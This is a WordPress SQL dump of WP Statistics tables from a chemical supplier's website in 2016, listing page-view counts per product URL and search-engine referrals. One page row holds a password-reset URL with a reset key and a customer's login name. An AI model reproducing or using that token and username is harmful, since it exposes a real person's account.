INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-11-03', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-11-03', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-11-03', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/vazo-52/', '2016-11-03', 1, 569); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/vazo-52/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 569); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-11-03', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-11-03', 3, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-11-03', 4, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-11-03', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-11-03', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-11-03', 3, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-11-03', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-11-03', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/', '2016-11-03', 1, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-11-03', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-11-03', 1, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-11-03', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-11-03', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-11-03', 1, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?reset-link-sent=true', '2016-11-03', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-11-03', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-11-03', 3, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?key=xlwQzBZrRn5OPxTu5Sbg&login=Sarah.Lakewood', '2016-11-03', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?show-reset-form=true', '2016-11-03', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?show-reset-form=true&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?show-reset-form=true&reset=true', '2016-11-03', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLqjoKezjdACFUVqfgod2lIA4Q', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLqjoKezjdACFUVqfgod2lIA4Q&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-500/', '2016-11-03', 1, 707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CJe67by7jdACFZRhfgodcnME8Q', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CJe67by7jdACFZRhfgodcnME8Q&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CP3V2Yq9jdACFcNhfgod5VYCvA', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CP3V2Yq9jdACFcNhfgod5VYCvA&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-11-03', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/?wc-ajax=get_refreshed_fragments', '2016-11-03', 3, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-11-03', 2, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-11-03', 1, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-11-03', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLqqxuzDjdACFYJBhgodYrIPeQ', '2016-11-03', 4, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLeCjO7DjdACFU0HhgodkTwL7Q', '2016-11-03', 4, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLqqxuzDjdACFYJBhgodYrIPeQ&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-11-03', 2, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKX_1qHHjdACFQFqfgodNGEP4w', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKX_1qHHjdACFQFqfgodNGEP4w&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2050', '2016-11-03', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-11-03', 1, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-11-03', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLG9o47UjdACFROUfgod7eQMUg', '2016-11-03', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CLG9o47UjdACFROUfgod7eQMUg&wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/', '2016-11-03', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/?wc-ajax=get_refreshed_fragments', '2016-11-03', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-11-03', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-11-04', 65, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-11-04', 8, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CMvjgK_yjdACFQyffgodiTkAog', '2016-11-04', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CMvjgK_yjdACFQyffgodiTkAog&wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-11-04', 11, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-11-04', 8, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-11-04', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-11-04', 2, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?wc-ajax=get_refreshed_fragments', '2016-11-04', 2, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8021/', '2016-11-04', 1, 970); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-11-04', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-11-04', 6, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-11-04', 10, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-11-04', 9, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-11-04', 3, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-11-04', 1, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-11-04', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-11-04', 7, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-11-04', 1, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-11-04', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-11-04', 3, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/military-spec-chemicals/', '2016-11-04', 1, 2773); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-11-04', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-11-04', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKmi1NL-jdACFY9bfgod9pYIGg', '2016-11-04', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKmi1NL-jdACFY9bfgod9pYIGg&wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-11-04', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CO78xKL_jdACFUVDhgodwvQEqw', '2016-11-04', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CO78xKL_jdACFUVDhgodwvQEqw&wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CjwKEAjwwOvABRC08aedoZ_lnTMSJACs_cbuOr0wRZSQWlDF3DQFt4HKsr7rzxnhHg3ol5U_4Y1h5xoCVCDw_wcB', '2016-11-04', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CjwKEAjwwOvABRC08aedoZ_lnTMSJACs_cbuOr0wRZSQWlDF3DQFt4HKsr7rzxnhHg3ol5U_4Y1h5xoCVCDw_wcB&wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-11-04', 6, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-11-04', 2, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKGzuP-jjtACFRIlgQodk0gOCA', '2016-11-04', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?gclid=CKGzuP-jjtACFRIlgQodk0gOCA&wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-11-04', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-11-04', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-11-04', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?action=register', '2016-11-04', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/', '2016-11-04', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-11-04', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-11-04', 4, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-11-04', 3, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-11-04', 2, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-11-04', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-1000/', '2016-11-04', 1, 708); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-1000/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 708); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1163/', '2016-11-04', 1, 1019); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/', '2016-11-04', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-11-04', 2, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-11-04', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/143aa/', '2016-11-04', 1, 579); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-12-08', 5, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-12-08', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-12-08', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-12-08', 1, 1842);
#
# End of data contents of table `wp_statistics_pages`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_statistics_search`


#
# Delete any existing table `wp_statistics_search`
#

DROP TABLE IF EXISTS `wp_statistics_search`;


#
# Table structure of table `wp_statistics_search`
#

CREATE TABLE `wp_statistics_search` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `last_counter` date NOT NULL,
  `engine` varchar(64) NOT NULL,
  `host` varchar(255) DEFAULT NULL,
  `words` varchar(255) DEFAULT NULL,
  `visitor` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`ID`),
  KEY `last_counter` (`last_counter`),
  KEY `engine` (`engine`),
  KEY `host` (`host`)
) ENGINE=MyISAM AUTO_INCREMENT=3907 DEFAULT CHARSET=utf8 ;

#
# Data contents of table `wp_statistics_search`
#
 
INSERT INTO `wp_statistics_search` VALUES (1, '2016-10-04', 'google', 'www.google.com', '', 7); 
INSERT INTO `wp_statistics_search` VALUES (2, '2016-10-04', 'google', 'www.google.com', '', 8); 
INSERT INTO `wp_statistics_search` VALUES (3, '2016-10-04', 'google', 'www.google.com', '', 9); 
INSERT INTO `wp_statistics_search` VALUES (4, '2016-10-04', 'google', 'www.google.com', '', 10); 
INSERT INTO `wp_statistics_search` VALUES (5, '2016-10-04', 'google', 'www.google.com', '', 14); 
INSERT INTO `wp_statistics_search` VALUES (6, '2016-10-04', 'google', 'www.google.com', '', 17); 
INSERT INTO `wp_statistics_search` VALUES (7, '2016-10-04', 'google', 'www.google.com', '', 20); 
INSERT INTO `wp_statistics_search` VALUES (8, '2016-10-04', 'google', 'www.google.com', '', 22); 
INSERT INTO `wp_statistics_search` VALUES (9, '2016-10-04', 'google', 'www.google.com', '', 25); 
INSERT INTO `wp_statistics_search` VALUES (10, '2016-10-04', 'google', 'www.google.com', '', 30); 
INSERT INTO `wp_statistics_search` VALUES (11, '2016-10-04', 'google', 'www.google.com', '', 34); 
INSERT INTO `wp_statistics_search` VALUES (12, '2016-10-04', 'google', 'www.google.com', '', 42); 
INSERT INTO `wp_statistics_search` VALUES (13, '2016-10-04', 'google', 'www.google.com', '', 43); 
INSERT INTO `wp_statistics_search` VALUES (14, '2016-10-04', 'google', 'www.google.com', '', 44); 
INSERT INTO `wp_statistics_search` VALUES (15, '2016-10-04', 'bing', 'www.bing.com', 'Miller-Stephenson Epoxy 907.', 46); 
INSERT INTO `wp_statistics_search` VALUES (16, '2016-10-04', 'google', 'www.google.com', '', 59); 
INSERT INTO `wp_statistics_search` VALUES (17, '2016-10-04', 'google', 'www.google.com', '', 63); 
INSERT INTO `wp_statistics_search` VALUES (18, '2016-10-04', 'google', 'www.google.com', '', 64); 
INSERT INTO `wp_statistics_search` VALUES (19, '2016-10-04', 'google', 'www.google.com', '', 67); 
INSERT INTO `wp_statistics_search` VALUES (20, '2016-10-04', 'google', 'www.google.com', '', 71); 
INSERT INTO `wp_statistics_search` VALUES (21, '2016-10-04', 'google', 'www.google.com', '', 76); 
INSERT INTO `wp_statistics_search` VALUES (22, '2016-10-04', 'google', 'www.google.com', '', 86); 
INSERT INTO `wp_statistics_search` VALUES (23, '2016-10-04', 'bing', 'www.bing.com', '', 89); 
INSERT INTO `wp_statistics_search` VALUES (24, '2016-10-04', 'google', 'www.google.co.uk', '', 95); 
INSERT INTO `wp_statistics_search` VALUES (25, '2016-10-04', 'google', 'www.google.com', '', 99); 
INSERT INTO `wp_statistics_search` VALUES (26, '2016-10-04', 'google', 'www.google.com', '', 100); 
INSERT INTO `wp_statistics_search` VALUES (27, '2016-10-04', 'google', 'www.google.com', '', 108); 
INSERT INTO `wp_statistics_search` VALUES (28, '2016-10-04', 'google', 'www.google.com', '', 109); 
INSERT INTO `wp_statistics_search` VALUES (29, '2016-10-04', 'google', 'www.google.com', '', 110); 
INSERT INTO `wp_statistics_search` VALUES (30, '2016-10-05', 'google', 'www.google.ca', '', 122); 
INSERT INTO `wp_statistics_search` VALUES (31, '2016-10-05', 'yahoo', 'r.search.yahoo.com', '', 124); 
INSERT INTO `wp_statistics_search` VALUES (32, '2016-10-05', 'google', 'www.google.com.au', '', 127); 
INSERT INTO `wp_statistics_search` VALUES (33, '2016-10-05', 'google', 'www.google.com', 'quick freeze', 133); 
INSERT INTO `wp_statistics_search` VALUES (34, '2016-10-05', 'google', 'www.google.com', '', 139); 
INSERT INTO `wp_statistics_search` VALUES (35, '2016-10-05', 'google', 'www.google.com.br', '', 140); 
INSERT INTO `wp_statistics_search` VALUES (36, '2016-10-05', 'google', 'www.google.co.th', '', 144); 
INSERT INTO `wp_statistics_search` VALUES (37, '2016-10-05', 'google', 'www.google.ca', '', 148); 
INSERT INTO `wp_statistics_search` VALUES (38, '2016-10-05', 'yahoo', 'r.search.yahoo.com', '', 150); 
INSERT INTO `wp_statistics_search` VALUES (39, '2016-10-05', 'google', 'www.google.co.jp', '', 154); 
INSERT INTO `wp_statistics_search` VALUES (40, '2016-10-05', 'google', 'www.google.com', '', 156); 
INSERT INTO `wp_statistics_search` VALUES (41, '2016-10-05', 'google', 'www.google.com', '', 157); 
INSERT INTO `wp_statistics_search` VALUES (42, '2016-10-05', 'google', 'www.google.com', '', 159); 
INSERT INTO `wp_statistics_search` VALUES (43, '2016-10-05', 'google', 'www.google.com', '', 160); 
INSERT INTO `wp_statistics_search` VALUES (44, '2016-10-05', 'google', 'www.google.com', '', 161); 
INSERT INTO `wp_statistics_search` VALUES (45, '2016-10-05', 'google', 'com.google.android.googlequicksearchbox', '', 162); 
INSERT INTO `wp_statistics_search` VALUES (46, '2016-10-05', 'google', 'www.google.ca', '', 166); 
INSERT INTO `wp_statistics_search` VALUES (47, '2016-10-05', 'google', 'www.google.com', '', 171); 
INSERT INTO `wp_statistics_search` VALUES (48, '2016-10-05', 'google', 'www.google.com', '', 172); 
INSERT INTO `wp_statistics_search` VALUES (49, '2016-10-05', 'google', 'www.google.com', '', 173); 
INSERT INTO `wp_statistics_search` VALUES (50, '2016-10-05', 'google', 'www.google.com.tw', '', 175); 
INSERT INTO `wp_statistics_search` VALUES (51, '2016-10-05', 'google', 'www.google.co.in', '', 182); 
INSERT INTO `wp_statistics_search` VALUES (52, '2016-10-05', 'bing', 'www.bing.com', 'MS-122AD', 183); 
INSERT INTO `wp_statistics_search` VALUES (53, '2016-10-05', 'google', 'www.google.com', '', 184); 
INSERT INTO `wp_statistics_search` VALUES (54, '2016-10-05', 'google', 'www.google.com', '', 192); 
INSERT INTO `wp_statistics_search` VALUES (55, '2016-10-05', 'bing', 'www.bing.com', '', 193); 
INSERT INTO `wp_statistics_search` VALUES (56, '2016-10-05', 'google', 'www.google.com', '', 194); 
INSERT INTO `wp_statistics_search` VALUES (57, '2016-10-05', 'google', 'www.google.com', '', 196); 
INSERT INTO `wp_statistics_search` VALUES (58, '2016-10-05', 'google', 'www.google.co.kr', '', 197); 
INSERT INTO `wp_statistics_search` VALUES (59, '2016-10-05', 'google', 'www.google.com', '', 210); 
INSERT INTO `wp_statistics_search` VALUES (60, '2016-10-05', 'bing', 'www.bing.com', 'MILLER STEPHENS', 211); 
INSERT INTO `wp_statistics_search` VALUES (61, '2016-10-05', 'google', 'www.google.com', '', 215); 
INSERT INTO `wp_statistics_search` VALUES (62, '2016-10-05', 'google', 'www.google.com.tw', '', 216); 
INSERT INTO `wp_statistics_search` VALUES (63, '2016-10-05', 'bing', 'www.bing.com', 'EPON resin', 218); 
INSERT INTO `wp_statistics_search` VALUES (64, '2016-10-05', 'bing', 'www.bing.com', 'EPON resin', 219); 
INSERT INTO `wp_statistics_search` VALUES (65, '2016-10-05', 'google', 'www.google.co.uk', '', 231); 
INSERT INTO `wp_statistics_search` VALUES (66, '2016-10-05', 'google', 'www.google.co.kr', '', 237); 
INSERT INTO `wp_statistics_search` VALUES (67, '2016-10-05', 'google', 'www.google.de', '', 238); 
INSERT INTO `wp_statistics_search` VALUES (68, '2016-10-05', 'google', 'www.google.com', '', 241); 
INSERT INTO `wp_statistics_search` VALUES (69, '2016-10-05', 'google', 'www.google.co.in', '', 250); 
INSERT INTO `wp_statistics_search` VALUES (70, '2016-10-05', 'google', 'www.google.lv', '', 252); 
INSERT INTO `wp_statistics_search` VALUES (71, '2016-10-05', 'google', 'www.google.com.vn', '', 259); 
INSERT INTO `wp_statistics_search` VALUES (72, '2016-10-05', 'google', 'www.google.co.za', '', 261); 
INSERT INTO `wp_statistics_search` VALUES (73, '2016-10-05', 'google', 'www.google.co.in', '', 262); 
INSERT INTO `wp_statistics_search` VALUES (74, '2016-10-05', 'google', 'www.google.co.in', '', 263); 
INSERT INTO `wp_statistics_search` VALUES (75, '2016-10-05', 'google', 'www.google.com', '', 267); 
INSERT INTO `wp_statistics_search` VALUES (76, '2016-10-05', 'google', 'www.google.dk', '', 270); 
INSERT INTO `wp_statistics_search` VALUES (77, '2016-10-05', 'google', 'www.google.com', '', 271); 
INSERT INTO `wp_statistics_search` VALUES (78, '2016-10-05', 'google', 'www.google.com', '', 277); 
INSERT INTO `wp_statistics_search` VALUES (79, '2016-10-05', 'google', 'www.google.lt', '', 278); 
INSERT INTO `wp_statistics_search` VALUES (80, '2016-10-05', 'google', 'www.google.com', '', 281); 
INSERT INTO `wp_statistics_search` VALUES (81, '2016-10-05', 'google', 'www.google.com', '', 285); 
INSERT INTO `wp_statistics_search` VALUES (82, '2016-10-05', 'google', 'www.google.ch', '', 286); 
INSERT INTO `wp_statistics_search` VALUES (83, '2016-10-05', 'google', 'www.google.co.in', '', 290); 
INSERT INTO `wp_statistics_search` VALUES (84, '2016-10-05', 'google', 'www.google.ro', '', 291); 
INSERT INTO `wp_statistics_search` VALUES (85, '2016-10-05', 'google', 'www.google.com', '', 297); 
INSERT INTO `wp_statistics_search` VALUES (86, '2016-10-05', 'google', 'www.google.com', '', 298); 
INSERT INTO `wp_statistics_search` VALUES (87, '2016-10-05', 'google', 'www.google.com', '', 300); 
INSERT INTO `wp_statistics_search` VALUES (88, '2016-10-05', 'google', 'www.google.com.br', '', 301); 
INSERT INTO `wp_statistics_search` VALUES (89, '2016-10-05', 'google', 'www.google.com', '', 304); 
INSERT INTO `wp_statistics_search` VALUES (90, '2016-10-05', 'google', 'www.google.es', '', 311); 
INSERT INTO `wp_statistics_search` VALUES (91, '2016-10-05', 'google', 'www.google.com', '', 315); 
INSERT INTO `wp_statistics_search` VALUES (92, '2016-10-05', 'google', 'www.google.com', '', 320); 
INSERT INTO `wp_statistics_search` VALUES (93, '2016-10-05', 'google', 'www.google.com', '', 321); 
INSERT INTO `wp_statistics_search` VALUES (94, '2016-10-05', 'google', 'www.google.com', '', 324); 
INSERT INTO `wp_statistics_search` VALUES (95, '2016-10-05', 'yahoo', 'r.search.yahoo.com', '', 326); 
INSERT INTO `wp_statistics_search` VALUES (96, '2016-10-05', 'google', 'www.google.com', '', 328); 
INSERT INTO `wp_statistics_search` VALUES (97, '2016-10-05', 'google', 'www.google.com', '', 329); 
INSERT INTO `wp_statistics_search` VALUES (98, '2016-10-05', 'yahoo', 'search.yahoo.com', '', 330); 
INSERT INTO `wp_statistics_search` VALUES (99, '2016-10-05', 'google', 'www.google.co.za', '', 331); 
INSERT INTO `wp_statistics_search` VALUES (100, '2016-10-05', 'google', 'www.google.com', '', 334); 
INSERT INTO `wp_statistics_search` VALUES (101, '2016-10-05', 'google', 'www.google.com', '', 338); 
INSERT INTO `wp_statistics_search` VALUES (102, '2016-10-05', 'google', 'www.google.com', '', 340); 
INSERT INTO `wp_statistics_search` VALUES (103, '2016-10-05', 'google', 'www.google.com', '', 342); 
INSERT INTO `wp_statistics_search` VALUES (104, '2016-10-05', 'google', 'www.google.com.tr', '', 345); 
INSERT INTO `wp_statistics_search` VALUES (105, '2016-10-05', 'google', 'www.google.es', '', 346); 
INSERT INTO `wp_statistics_search` VALUES (106, '2016-10-05', 'google', 'www.google.com', '', 347); 
INSERT INTO `wp_statistics_search` VALUES (107, '2016-10-05', 'google', 'www.google.com', '', 350); 
INSERT INTO `wp_statistics_search` VALUES (108, '2016-10-05', 'google', 'www.google.ca', '', 354); 
INSERT INTO `wp_statistics_search` VALUES (109, '2016-10-05', 'google', 'www.google.com', '', 356); 
INSERT INTO `wp_statistics_search` VALUES (110, '2016-10-05', 'google', 'www.google.com', '', 357); 
INSERT INTO `wp_statistics_search` VALUES (111, '2016-10-05', 'google', 'www.google.co.in', '', 362); 
INSERT INTO `wp_statistics_search` VALUES (112, '2016-10-05', 'google', 'www.google.com', '', 366); 
INSERT INTO `wp_statistics_search` VALUES (113, '2016-10-05', 'google', 'www.google.com', '', 367); 
INSERT INTO `wp_statistics_search` VALUES (114, '2016-10-05', 'google', 'www.google.com', '', 368); 
INSERT INTO `wp_statistics_search` VALUES (115, '2016-10-05', 'google', 'www.google.com', '', 369); 
INSERT INTO `wp_statistics_search` VALUES (116, '2016-10-05', 'google', 'www.google.com', '', 371); 
INSERT INTO `wp_statistics_search` VALUES (117, '2016-10-05', 'google', 'www.google.com', '', 373); 
INSERT INTO `wp_statistics_search` VALUES (118, '2016-10-05', 'google', 'www.google.com', '', 374); 
INSERT INTO `wp_statistics_search` VALUES (119, '2016-10-05', 'bing', 'www.bing.com', 'miller-stephenson chemical co', 375); 
INSERT INTO `wp_statistics_search` VALUES (120, '2016-10-05', 'google', 'www.google.dk', '', 376); 
INSERT INTO `wp_statistics_search` VALUES (121, '2016-10-05', 'google', 'www.google.com', '', 377); 
INSERT INTO `wp_statistics_search` VALUES (122, '2016-10-05', 'google', 'www.google.com', '', 380); 
INSERT INTO `wp_statistics_search` VALUES (123, '2016-10-05', 'google', 'www.google.com', '', 382); 
